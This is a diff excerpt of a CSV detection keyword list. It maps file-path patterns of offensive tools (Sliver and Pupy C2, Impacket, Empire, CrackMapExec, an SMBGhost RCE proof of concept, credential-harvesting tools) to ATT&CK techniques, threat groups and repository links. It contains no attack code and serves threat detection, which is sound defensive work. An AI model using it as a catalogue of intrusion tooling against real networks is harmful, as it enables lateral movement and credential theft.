-"*/sliver/evasion/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/sliver-server*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/smb.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*/smb/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/SMB_RPC/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/sliver.git*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver.pb.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver.proto*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver/evasion/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver-server*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/smb.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/smb/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/SMB_RPC/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/smb2-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-vuln-uptime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/smb3.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/smb3.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/smb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-cmds.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/smb-double-pulsar-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*/SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*/smb-enum-domains.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-groups.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -5309,16 +5366,16 @@ "*/smb-enum-sessions.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/smbexec.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/smbexec.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/smb-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/SMBForwarder.txt*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/SMBForwarder.txt*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/SMBGhost/scanner.py*","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","647","206","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" "*/SMBGhost_RCE*","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1264","355","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" -"*/smbldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/smbldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/smb-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/smbmap.git*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*/smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/smbmap.git*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*/smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/smb-mbenum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-os-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-print-text.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -5329,7 +5386,7 @@ "*/smbserver/smb_server.py*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*/smb-server-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-signing-disabled-hosts.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*/smbspider.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/smbspider.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/smbsr.db*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" 